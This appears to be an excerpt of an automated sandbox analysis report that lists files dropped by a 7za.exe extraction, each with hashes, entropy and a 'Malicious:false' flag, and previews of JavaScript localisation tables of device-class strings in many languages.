      Preview:window.languages["ps"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "Bluetooth .....",. "deviceclasses_bluetooth-single-for": "Bluetooth .....",. "deviceclasses_bluetooth-plural-main": "Bluetooth .....",. "deviceclasses_bluetooth-plural-for": "Bluetooth .....",. "deviceclasses_cardreader-single-main": "........",. "deviceclasses_cardreader-single-for": "........",. "deviceclasses_cardreader-plural-main": ".........",. "deviceclasses_cardreader-plural-for": ".........",. "deviceclasses_chipset-single-main": "......",. "deviceclasses_chipset-single-for": "......",. "deviceclasses_chipset-plural-main": ".......",. "deviceclasses_chipset-plural-for": ".......",. "deviceclasses_inputdev-single-main": ". ..... .....",. "deviceclasses_inputdev-single-for": ". ..... .....",. "deviceclasses_inputdev-plural-main": ". ..... .
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):92490
      Entropy (8bit):4.891327129193638
      Encrypted:false
      SSDEEP:
      MD5:ECFE4035540EBE5ACF6B2D3975083013
      SHA1:1497877FB0AEB7AD404FD96687FC0CF212F9BFEE
      SHA-256:5937F00682BF40EFEE7BA20E9A3AE3D4FA277CF705BFF136080D9D48D0ECE068
      SHA-512:E1E72055633A6421D31AF26E7DFCEC8D3722182EC9301CD7FBD3D9B9079E7B463BD6E09E42D735A9951FFF6F5F927CCC2846D513DC25EDBB76CAFF1E28E8688D
      Malicious:false
      Reputation:low
      Preview:window.languages["pt-br"] = {. plural: function (n) { return Number((n > 1)) },. "deviceclasses_bluetooth-single-main": "dispositivo Bluetooth",. "deviceclasses_bluetooth-single-for": "dispositivo Bluetooth",. "deviceclasses_bluetooth-plural-main": "dispositivos Bluetooth",. "deviceclasses_bluetooth-plural-for": "dispositivos Bluetooth",. "deviceclasses_cardreader-single-main": "leitor de.cart.o",. "deviceclasses_cardreader-single-for": "leitor de.cart.o",. "deviceclasses_cardreader-plural-main": "leitores de.cart.o",. "deviceclasses_cardreader-plural-for": "leitores de.cart.o",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "chipsets",. "deviceclasses_chipset-plural-for": "chipsets",. "deviceclasses_inputdev-single-main": "dispositivo de.entrada",. "deviceclasses_inputdev-single-for": "dispositivo de.entrada",. "deviceclasses_inputdev-plural-main": "dispositivos de.entrad
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):91909
      Entropy (8bit):4.881430312964297
      Encrypted:false
      SSDEEP:
      MD5:B0FFDC3EB35DECA832713B2480C574BA
      SHA1:F9CFB449ADF226E5A7900854C9770D06861EFDE9
      SHA-256:AA3EC38355D4A368D975C09D268C13902EB944958E4546A5B67A9D0FCB24C820
      SHA-512:E76F398D434427289287DACA8FB75532AFBC45959535D5D79BDDF493CDC8E4AC2BF69731C37366389F6BFF85D19D09DFF70E8D029D480677324B5570C362AEE1
      Malicious:false
      Reputation:low
      Preview:window.languages["pt-pt"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "dispositivo Bluetooth",. "deviceclasses_bluetooth-single-for": "Dispositivo Bluetooth",. "deviceclasses_bluetooth-plural-main": "dispositivos Bluetooth",. "deviceclasses_bluetooth-plural-for": "dispositivos Bluetooth",. "deviceclasses_cardreader-single-main": "leitor de.cart.es",. "deviceclasses_cardreader-single-for": "leitor de.cart.es",. "deviceclasses_cardreader-plural-main": "leitores de.cart.es",. "deviceclasses_cardreader-plural-for": "leitores de.cart.es",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "chipsets",. "deviceclasses_chipset-plural-for": "chipsets",. "deviceclasses_inputdev-single-main": "dispositivo de.entrada",. "deviceclasses_inputdev-single-for": "dispositivo de.entrada",. "deviceclasses_inputdev-plural-main": "dispositivos de.e
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):91869
      Entropy (8bit):4.906565635334403
      Encrypted:false
      SSDEEP:
      MD5:BE0F1E202FC900F7F8D3C35C63730BB6
      SHA1:1B9E8A204C56B8FCEE6F0C56ABD1339CCC7A594B
      SHA-256:D2112C8B1B8F1DD83E1592451505DF3A30C3103C0405AF28CFB5C93DD8C5B6D5
      SHA-512:4F907BFDA70D742140B9E41B553FAA27F1C68A3DBB35DFF8CC472373F9244E46A2FFF1027AAC2DE5283CFD0B5C16A6FBE2EBDDF984CB91D630AD1E71BEB0B9E5
      Malicious:false
      Reputation:low
      Preview:window.languages["ro"] = {. plural: function (n) { return Number((n==1?0:(((n%100>19)||((n%100==0)&&(n!=0)))?2:1))) },. "deviceclasses_bluetooth-single-main": "Dispozitiv Bluetooth",. "deviceclasses_bluetooth-single-for": "Dispozitiv Bluetooth",. "deviceclasses_bluetooth-plural-main": "Dispozitive Bluetooth",. "deviceclasses_bluetooth-plural-for": "Dispozitive Bluetooth",. "deviceclasses_cardreader-single-main": "cititor de.carduri",. "deviceclasses_cardreader-single-for": "cititor de.carduri",. "deviceclasses_cardreader-plural-main": "cititoare de.carduri",. "deviceclasses_cardreader-plural-for": "cititoare de.carduri",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "chipset-uri",. "deviceclasses_chipset-plural-for": "chipset-uri",. "deviceclasses_inputdev-single-main": "dispozitiv de.intrare",. "deviceclasses_inputdev-single-for": "dispozitiv de.intrare",. "deviceclasses_inpu
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (542)
      Category:dropped
      Size (bytes):128518
      Entropy (8bit):5.0421574009077474
      Encrypted:false
      SSDEEP:
      MD5:9E2FA0A6123C73DF35D9016FC8F0ED81
      SHA1:E10515E4FC6E8269B36EF912E18B162C88021018
      SHA-256:A9E5A115EE2EB6FE430B9F76D52D96842E95BF3D2A46CCA34F38358BC64306F0
      SHA-512:83081EBA72F01CBC114D8E6CA6C87144F6725F2C57BF69DFA18D9CFB49EFDD44B4D93086EFCEF8D5254D86A4019FA6613BEC6541AB5BEC62989B5B2DED9387EA
      Malicious:false
      Reputation:low
      Preview:window.languages["ru"] = {. plural: function (n) { return Number((n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<12 || n%100>14) ? 1 : n%10==0 || (n%10>=5 && n%10<=9) || (n%100>=11 && n%100<=14)? 2 : 3)) },. "deviceclasses_bluetooth-single-main": ".......... Bluetooth",. "deviceclasses_bluetooth-single-for": ".......... Bluetooth",. "deviceclasses_bluetooth-plural-main": ".......... Bluetooth",. "deviceclasses_bluetooth-plural-for": "......... Bluetooth",. "deviceclasses_cardreader-single-main": ".........",. "deviceclasses_cardreader-single-for": "..........",. "deviceclasses_cardreader-plural-main": "..........",. "deviceclasses_cardreader-plural-for": "...........",. "deviceclasses_chipset-single-main": "......",. "deviceclasses_chipset-single-for": ".......",. "deviceclasses_chipset-plural-main": ".......",. "deviceclasses_chipset-plural-for": "........",
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):92145
      Entropy (8bit):5.079701063696059
      Encrypted:false
      SSDEEP:
      MD5:3CAD7AB75FFF2A2A3E735C64796C7ADB
      SHA1:C4008C3398BB5B87FB0147764230FE05B5A99144
      SHA-256:BF7630CCAC6B9AE86F049102454E1751A8D3E9AA9B8CAC60B1B5699CCEDF6D3A
      SHA-512:A4D5A447B08EE43344B26718714F7F1406D1124072A0DCD79FD0C4C95EAF019803DD56A3FBD19DEAEAC89E35D94A34D501664F144E2C00CF37B25AD4EA2A9A00
      Malicious:false
      Reputation:low
      Preview:window.languages["sk"] = {. plural: function (n) { return Number((n % 1 == 0 && n == 1 ? 0 : n % 1 == 0 && n >= 2 && n <= 4 ? 1 : n % 1 != 0 ? 2: 3)) },. "deviceclasses_bluetooth-single-main": "Bluetooth zariadenie",. "deviceclasses_bluetooth-single-for": "Bluetooth zariadenie",. "deviceclasses_bluetooth-plural-main": "Bluetooth zariadenia",. "deviceclasses_bluetooth-plural-for": "Bluetooth zariadenia",. "deviceclasses_cardreader-single-main": "..ta.ka kariet",. "deviceclasses_cardreader-single-for": "..ta.ka kariet",. "deviceclasses_cardreader-plural-main": "..ta.ky kariet",. "deviceclasses_cardreader-plural-for": "..ta.ky kariet",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "chipsets",. "deviceclasses_chipset-plural-for": "chipsets",. "deviceclasses_inputdev-single-main": "vstupn. zariadenie",. "deviceclasses_inputdev-single-for": "vstupn. zariadenie",. "deviceclas
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (585)
      Category:dropped
      Size (bytes):91287
      Entropy (8bit):4.935612529103863
      Encrypted:false
      SSDEEP:
      MD5:243E3544776D8E85DB11F387962CF8FB
      SHA1:A793FDBC21120CE7BB3CBCECE01FE44DE4EA6115
      SHA-256:EA5E0309E33A0125CD212100DF0565B045DB88915B8C41D22C2BDC97F2D3D5D0
      SHA-512:62DBC981A209457FCB498DC73D8B75D17E3F7E849B4BADFA59D6EE4167D41C14A6CF0B1D4DF05EDF082D659039635F67E1F36D8AB52D25BDBBE861AF2337E926
      Malicious:false
      Reputation:low
      Preview:window.languages["sl"] = {. plural: function (n) { return Number((n%100==1 ? 0 : n%100==2 ? 1 : n%100==3 || n%100==4 ? 2 : 3)) },. "deviceclasses_bluetooth-single-main": "naprava Bluetooth",. "deviceclasses_bluetooth-single-for": "naprava Bluetooth",. "deviceclasses_bluetooth-plural-main": "naprave Bluetooth",. "deviceclasses_bluetooth-plural-for": "naprave Bluetooth",. "deviceclasses_cardreader-single-main": "bralnik kartic",. "deviceclasses_cardreader-single-for": "bralnik kartic",. "deviceclasses_cardreader-plural-main": "bralnike kartic",. "deviceclasses_cardreader-plural-for": "bralnike kartic",. "deviceclasses_chipset-single-main": "sistemski nabor",. "deviceclasses_chipset-single-for": "sistemski nabor",. "deviceclasses_chipset-plural-main": "sistemski nabori",. "deviceclasses_chipset-plural-for": "sistemski nabori",. "deviceclasses_inputdev-single-main": "vhodna naprava",. "deviceclasses_inputdev-single-for": "vhodno napravo",. "deviceclasses_inputdev-plural-mai
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):90805
      Entropy (8bit):4.926372396868904
      Encrypted:false
      SSDEEP:
      MD5:31811820A1AE7CE25D4E293E60C76CA6
      SHA1:706EC74C1F9654E5785F0164A02B42FA5357FD43
      SHA-256:7FFF3A1408E1D3B824417F14B7CE74DEA18BB1D4C83878516AAAC1B263CCF6CC
      SHA-512:6B1C5D5978004C4113D1675120FE682B6BDC8BEAF0E598CAC7B7A35A21A60E10A366EE4CF4BA43FD6F6F047789E186850382719F387AD6A3C2246376C7660EAB
      Malicious:false
      Reputation:low
      Preview:window.languages["sq"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "pajisja Bluetooth",. "deviceclasses_bluetooth-single-for": "t. pajisjes Bluetooth",. "deviceclasses_bluetooth-plural-main": "pajisjet Bluetooth",. "deviceclasses_bluetooth-plural-for": "pajisjet Bluetooth",. "deviceclasses_cardreader-single-main": "lexues kart. memorie",. "deviceclasses_cardreader-single-for": "lexuesin p.r kart. memorie",. "deviceclasses_cardreader-plural-main": "lexuesit e.kartave memorie",. "deviceclasses_cardreader-plural-for": "lexuesit e.kartave memorie",. "deviceclasses_chipset-single-main": ".ipseti",. "deviceclasses_chipset-single-for": "e..ipsetit",. "deviceclasses_chipset-plural-main": ".ipset.t",. "deviceclasses_chipset-plural-for": "e..ipset.ve",. "deviceclasses_inputdev-single-main": "pajisja hyr.se",. "deviceclasses_inputdev-single-for": "pajisjen hyr.se",. "deviceclasses_inputdev-plural-main": "pajisje hy
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):89849
      Entropy (8bit):4.938705328951669
      Encrypted:false
      SSDEEP:
      MD5:8A63A3F273C2CEF8425BCF35A9BE633B
      SHA1:C950AD97BBE724DBF63CAEC4F26A1E47E2438F92
      SHA-256:9EB476F11A5F41E352AC25B6755C36C20798FCDBA0B4D7696DF6DF271B30C67E
      SHA-512:8CD1ABDECAB07686175B08E2FC19475637F938AF35D4F9C07ACE3C3FB916B189450341540CE3D3259B0DA340877DFB572F0BDA1A54F5FD69C57A899B56BCDF6B
      Malicious:false
      Reputation:low
      Preview:window.languages["sr"] = {. plural: function (n) { return Number((n%10==1 && n%100!=11 ? 0 : n%10>=2 && n%10<=4 && (n%100<10 || n%100>=20) ? 1 : 2)) },. "deviceclasses_bluetooth-single-main": "Bluetooth ure.aj",. "deviceclasses_bluetooth-single-for": "Bluetooth ure.aja",. "deviceclasses_bluetooth-plural-main": "Bluetooth ure.aji",. "deviceclasses_bluetooth-plural-for": "Bluetooth ure.aja",. "deviceclasses_cardreader-single-main": ".ita. kartica",. "deviceclasses_cardreader-single-for": ".ita. kartice",. "deviceclasses_cardreader-plural-main": ".ita.i kartica",. "deviceclasses_cardreader-plural-for": ".ita.a kartica",. "deviceclasses_chipset-single-main": ".ipset",. "deviceclasses_chipset-single-for": ".ipseta",. "deviceclasses_chipset-plural-main": ".ipseti",. "deviceclasses_chipset-plural-for": ".ipseta",. "deviceclasses_inputdev-single-main": "ulazni ure.jaj",. "deviceclasses_inputdev-single-for": "ulaznog ure.aja",. "deviceclasses_inputdev-plural-ma
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):88021
      Entropy (8bit):4.88397793574362
      Encrypted:false
      SSDEEP:
      MD5:4BE2492B21971F769F538D5259AA668C
      SHA1:DA90304C670C9A3CD67C586C1D444EF4AF925A4F
      SHA-256:2BB53FD232D4F1AB8DCFB4406A9FD60ECBFEF60A87610DA41EA638D9CA61D9A5
      SHA-512:391A210B5F6CE80603B34169F32D99776CA3D6334055EE7988ED7D2C27BA215DB6854482AA561506D19CE8E40DB4C912411452155C33E9629BBC0879C868FC41
      Malicious:false
      Reputation:low
      Preview:window.languages["sw"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "kifaa cha Bluetooth",. "deviceclasses_bluetooth-single-for": "kifaa cha Bluetooth",. "deviceclasses_bluetooth-plural-main": "vifaa vya Bluetooth",. "deviceclasses_bluetooth-plural-for": "vifaa vya Bluetooth",. "deviceclasses_cardreader-single-main": "kisoma kadi",. "deviceclasses_cardreader-single-for": "kisoma kadi",. "deviceclasses_cardreader-plural-main": "visoma kadi",. "deviceclasses_cardreader-plural-for": "visoma kadi",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "chipset",. "deviceclasses_chipset-plural-for": "chipset",. "deviceclasses_inputdev-single-main": "kifaa cha kuingiza",. "deviceclasses_inputdev-single-for": "kifaa cha kuingiza",. "deviceclasses_inputdev-plural-main": "vifaa vya kuingiza",. "deviceclasses_inputdev-plural-for": "vifaa vya kuingiza
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):136583
      Entropy (8bit):5.010728512638004
      Encrypted:false
      SSDEEP:
      MD5:E2366E3601FE40A1DE1921525D967D6F
      SHA1:DFC25CEB84469E5EE87C800471F76F31E492B17E
      SHA-256:A663E29394B463D234B359B92ECE07A8F76E110C61699864B72609928C4FEDB4
      SHA-512:41AD231CDC388073F4861231D3F5A647B75AF185C2E20FDD6860F3DDACAA01CF3F14C206982947D42CFE5DFA4E9020449A1EC49557DCDC18135565083A23889A
      Malicious:false
      Reputation:low
      Preview:window.languages["ta"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "Bluetooth ........ ......",. "deviceclasses_bluetooth-single-for": "Bluetooth ........ ......",. "deviceclasses_bluetooth-plural-main": "Bluetooth ........ .........",. "deviceclasses_bluetooth-plural-for": "Bluetooth ........ .........",. "deviceclasses_cardreader-single-main": "...... .....",. "deviceclasses_cardreader-single-for": "...... .....",. "deviceclasses_cardreader-plural-main": "...... ........",. "deviceclasses_cardreader-plural-for": "...... ........",. "deviceclasses_chipset-single-main": "........ ...... (........)",. "deviceclasses_chipset-single-for": "........
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):125387
      Entropy (8bit):5.141482346605252
      Encrypted:false
      SSDEEP:
      MD5:F4E47CE338C6D4C28D4C89D976A1BE86
      SHA1:9C89DF43F69ED28E30DD315DE11AD4B8329FA353
      SHA-256:961B4E97236391D1D91E64F1DCD92EEC9C3FC1C4F28DFCF3C28C0D5FB97C9B76
      SHA-512:7CBD302A1DA7C75E4F0DC402C442292B3FEFC22EBE654C4980E0B6698F0FEABCFA584CCBC41A3A9C6D8496FFAA546E56A6B96B298BFFA2FCEF2E258C078BCCCA
      Malicious:false
      Reputation:low
      Preview:window.languages["te"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "Bluetooth ......",. "deviceclasses_bluetooth-single-for": "Bluetooth ......",. "deviceclasses_bluetooth-plural-main": "Bluetooth ........",. "deviceclasses_bluetooth-plural-for": "Bluetooth ........",. "deviceclasses_cardreader-single-main": "...... .....",. "deviceclasses_cardreader-single-for": "...... .....",. "deviceclasses_cardreader-plural-main": "...... .......",. "deviceclasses_cardreader-plural-for": "...... .......",. "deviceclasses_chipset-single-main": "........",. "deviceclasses_chipset-single-for": "........",. "deviceclasses_chipset-plural-main": ".... ......",. "deviceclasses_chipset-plural-for": ".... ......",. "device
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):106658
      Entropy (8bit):5.338513599297998
      Encrypted:false
      SSDEEP:
      MD5:C8FE574E27A65EB8D31F1BE21A242C83
      SHA1:65044BD813F9D65773D20EAF42C45A5A8045CC69
      SHA-256:C5AB2EDED419FF974E5C27D4D9511C4B00AA173BE784FFBD3E94CCBB2561D8F2
      SHA-512:5C044DDD4E0FD124C6090F36E93DFF87414E6B92A580B804FF1C21BB879B7F0E1E43FCC43BD7752288FC07118A805DF43FB43C12AAA8C629D7EAAA9C54854E10
      Malicious:false
      Reputation:low
      Preview:window.languages["tg"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "......... Bluetooth",. "deviceclasses_bluetooth-single-for": "......... Bluetooth",. "deviceclasses_bluetooth-plural-main": "......... Bluetooth",. "deviceclasses_bluetooth-plural-for": "........... Bluetooth",. "deviceclasses_cardreader-single-main": ".........",. "deviceclasses_cardreader-single-for": ".........",. "deviceclasses_cardreader-plural-main": "........... ..",. "deviceclasses_cardreader-plural-for": "........... ..",. "deviceclasses_chipset-single-main": "......",. "deviceclasses_chipset-single-for": "......",. "deviceclasses_chipset-plural-main": "........",. "deviceclasses_chipset-plural-for": ".........",. "deviceclasses_inputdev-single-main": "......... .........",. "deviceclasses_inputdev-single-for": "..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):130982
      Entropy (8bit):5.099431930691623
      Encrypted:false
      SSDEEP:
      MD5:052D3EBF2F054055EA798EC4838397DC
      SHA1:3A1E878E9E438DAF2D477C064DC1F815E315F127
      SHA-256:DFDA8A5170E89236DF4CF89E3C29E5C433EB3ABB1035F0D28118A4DC850BA74C
      SHA-512:ACE550EF234CC75471B2980A41BFAC3E36F24390B7EC93B127B1CC90B8ED786E03147BB7A1A7266734D81C76BECCE22831C151002713AFBB9FED9D3FFAF24AEE
      Malicious:false
      Reputation:low
      Preview:window.languages["th"] = {. plural: function (n) { return Number(0) },. "deviceclasses_bluetooth-single-main": "....... Bluetooth",. "deviceclasses_bluetooth-single-for": "....... Bluetooth",. "deviceclasses_bluetooth-plural-main": "....... Bluetooth",. "deviceclasses_bluetooth-plural-for": "....... Bluetooth",. "deviceclasses_cardreader-single-main": "............",. "deviceclasses_cardreader-single-for": "............",. "deviceclasses_cardreader-plural-main": "............",. "deviceclasses_cardreader-plural-for": "............",. "deviceclasses_chipset-single-main": ".......",. "deviceclasses_chipset-single-for": ".......",. "deviceclasses_chipset-plural-main": ".......",. "deviceclasses_chipset-plural-for": ".......",. "deviceclasses_inputdev-single-main": "..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):91684
      Entropy (8bit):5.049006244426599
      Encrypted:false
      SSDEEP:
      MD5:DF2C5B81B6B1C779C5803CBF46D5A99D
      SHA1:EF9DBBC3E8CE687E1969EE2782AD89B276DFC80C
      SHA-256:88A0C964F22C2AA92C56CFEA03057FB939C78D09472F9D2CE6F136FB9031A3CA
      SHA-512:450C30BC41A7669B21E5752181FF01634800F7E7824C50377B3FB312F62E61F895379098E5B10807D630DA97B2864931565ABAF30F238010A05FC2BD663CE0BB
      Malicious:false
      Reputation:low
      Preview:window.languages["tr"] = {. plural: function (n) { return Number((n > 1)) },. "deviceclasses_bluetooth-single-main": "Bluetooth ayg.t.",. "deviceclasses_bluetooth-single-for": "Bluetooth ayg.t.",. "deviceclasses_bluetooth-plural-main": "Bluetooth ayg.tlar.",. "deviceclasses_bluetooth-plural-for": "Bluetooth ayg.tlar.",. "deviceclasses_cardreader-single-main": "kart okuyucu",. "deviceclasses_cardreader-single-for": "kart okuyucu",. "deviceclasses_cardreader-plural-main": "kart okuyucular.",. "deviceclasses_cardreader-plural-for": "kart okuyucular.",. "deviceclasses_chipset-single-main": "yonga seti",. "deviceclasses_chipset-single-for": "yonga seti",. "deviceclasses_chipset-plural-main": "yonga setleri",. "deviceclasses_chipset-plural-for": "yonga setleri",. "deviceclasses_inputdev-single-main": "giri. ayg.t.",. "deviceclasses_inputdev-single-for": "giri. ayg.t.",. "deviceclasses_inputdev-plural-main": "giri. ayg.tlar.",. "deviceclasses_inputdev-plura
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (542)
      Category:dropped
      Size (bytes):127531
      Entropy (8bit):5.095119238083753
      Encrypted:false
      SSDEEP:
      MD5:F520F47A1321631A039FE4DA9550F146
      SHA1:2ED5B29F51071DFDF2D2160EDD28C5BE3FA2811C
      SHA-256:2DB8F1166352BDD379AE0CCF97B57CEB98E21CDF4BBB5C2C5A9D42DF0389DA9B
      SHA-512:F8944B8A607C56EBFDBE30C179E92D6E8119B0FB988D330FC5D8BD31859B618A23785AE83C4018A596B6A333867A64663073EBA8B54A7D838FE71EDB3AAA28CD
      Malicious:false
      Reputation:low
      Preview:window.languages["uk"] = {. plural: function (n) { return Number((n % 1 == 0 && n % 10 == 1 && n % 100 != 11 ? 0 : n % 1 == 0 && n % 10 >= 2 && n % 10 <= 4 && (n % 100 < 12 || n % 100 > 14) ? 1 : n % 1 == 0 && (n % 10 ==0 || (n % 10 >=5 && n % 10 <=9) || (n % 100 >=11 && n % 100 <=14 )) ? 2: 3)) },. "deviceclasses_bluetooth-single-main": "........ Bluetooth",. "deviceclasses_bluetooth-single-for": "........ Bluetooth",. "deviceclasses_bluetooth-plural-main": "........ Bluetooth",. "deviceclasses_bluetooth-plural-for": "......... Bluetooth",. "deviceclasses_cardreader-single-main": ".........",. "deviceclasses_cardreader-single-for": "..........",. "deviceclasses_cardreader-plural-main": "..........",. "deviceclasses_cardreader-plural-for": "...........",. "deviceclasses_chipset-single-main": "......",. "deviceclasses_chipset-single-for": ".......",. "deviceclasses_chipset-plural-main": ".
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):90716
      Entropy (8bit):5.080546596030112
      Encrypted:false
      SSDEEP:
      MD5:EF8780B5E6D675E667DCEB53C6EDCEE6
      SHA1:BAAAA76F9853D3C65BE09B7FA2F12F0B06E0893C
      SHA-256:000E57145F47FA3C475E6EC8DBF71D997D8CABA55544DEDCE316B6283C6E1973
      SHA-512:A17950149FB33AB2F55BE6F82F3CEB1140DF5C1A037C15342D27013AC7E3820E764C1E7AB49DA1C43C7D01B8F68FDDD1692AEAFD2B1953E20EA2D654DD7FE8CA
      Malicious:false
      Reputation:low
      Preview:window.languages["ur"] = {. plural: function (n) { return Number((n != 1)) },. "deviceclasses_bluetooth-single-main": "Bluetooth ...",. "deviceclasses_bluetooth-single-for": "Bluetooth ...",. "deviceclasses_bluetooth-plural-main": "...... ....",. "deviceclasses_bluetooth-plural-for": "...... ....",. "deviceclasses_cardreader-single-main": ".... ....",. "deviceclasses_cardreader-single-for": ".... ....",. "deviceclasses_cardreader-plural-main": ".... .....",. "deviceclasses_cardreader-plural-for": ".... .....",. "deviceclasses_chipset-single-main": ".. ...",. "deviceclasses_chipset-single-for": ".. ...",. "deviceclasses_chipset-plural-main": ".. ....",. "deviceclasses_chipset-plural-for": ".. ....",. "deviceclasses_inputdev-single-main": ".. .. ...",. "deviceclasses_inputdev-single-for": ".. .. ...",. "deviceclasses_inputdev-plural-main": ".. .. ....",. "deviceclasses
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):90622
      Entropy (8bit):4.8987180731828825
      Encrypted:false
      SSDEEP:
      MD5:8DD42CC965BF9A84B389C1EE4743F43C
      SHA1:1302182D9C829123E170D51EFC1923F681D00573
      SHA-256:291F4FBB49B1184176BEC0F2FB7F01BA2045B94E3136AFC837426E47C503A949
      SHA-512:5D57C7F224EA96A8E8419F92BAF9EFB23149A8BB9A5E45301A9FD857E58B0729CECBE2C8837BE9C20DA50ECECACEF81ABC1E9E1222D60FB20174922523365F9F
      Malicious:false
      Reputation:low
      Preview:window.languages["uz"] = {. plural: function (n) { return Number(0) },. "deviceclasses_bluetooth-single-main": "Bluetooth qurilmasi",. "deviceclasses_bluetooth-single-for": "Bluetooth qurilmasi",. "deviceclasses_bluetooth-plural-main": "Bluetooth qurilmasi",. "deviceclasses_bluetooth-plural-for": "Bluetooth qurilmasini",. "deviceclasses_cardreader-single-main": "kartrider",. "deviceclasses_cardreader-single-for": "kartriderni",. "deviceclasses_cardreader-plural-main": "kartriderlar",. "deviceclasses_cardreader-plural-for": "kartriderlarni",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipsetni",. "deviceclasses_chipset-plural-main": "chipsetlar",. "deviceclasses_chipset-plural-for": "chipsetlarni",. "deviceclasses_inputdev-single-main": "kiritish qurilmasi",. "deviceclasses_inputdev-single-for": "kiritish qurilmasi",. "deviceclasses_inputdev-plural-main": "kiritish qurilmasi",. "deviceclasses_inputdev-plural-for": "kiritish qu
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):89321
      Entropy (8bit):4.970422635995908
      Encrypted:false
      SSDEEP:
      MD5:A322DCB20B421DB76FD49F05232096C8
      SHA1:C82CDAC9E567DF7E40A67B0326AD6D2A1D2CDAF3
      SHA-256:3B230ADBA609CA7793CF122E9CA1240A54CA2307407E471730E4CFA7DA9BBF90
      SHA-512:395DF2B208935EF4AEA1D7BC9E30CB90C3D52EE8E15D3AD5797E6A07642FF44E836595EFA03EA02642D606CF0D2E61618FC9406F50F0F6314E30C68B3EE0DA04
      Malicious:false
      Reputation:low
      Preview:window.languages["vi"] = {. plural: function (n) { return Number(0) },. "deviceclasses_bluetooth-single-main": "Thi.t b. bluetooth",. "deviceclasses_bluetooth-single-for": "Thi.t b. bluetooth",. "deviceclasses_bluetooth-plural-main": "Thi.t b. bluetooth",. "deviceclasses_bluetooth-plural-for": "Thi.t b. bluetooth",. "deviceclasses_cardreader-single-main": "..u ..c th.",. "deviceclasses_cardreader-single-for": "..u ..c th.",. "deviceclasses_cardreader-plural-main": "C.c ..u ..c th.",. "deviceclasses_cardreader-plural-for": "C.c ..u ..c th.",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "c.c chipset",. "deviceclasses_chipset-plural-for": "c.c chipset",. "deviceclasses_inputdev-single-main": "thi.t b. ..u v.o",. "deviceclasses_inputdev-single-for": "thi.t b. ..u v.o",. "deviceclasses_inputdev-plural-main": "c.c thi.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):90932
      Entropy (8bit):5.0334928770103184
      Encrypted:false
      SSDEEP:
      MD5:2D5AB77998073BD8E2D8D19B21410498
      SHA1:238AA3BF6763ECD0F981D3838EB9A41DB91D4898
      SHA-256:2557B855582219043885F1668D1EB87CD8975AE356414306304430F9F6FEBBE3
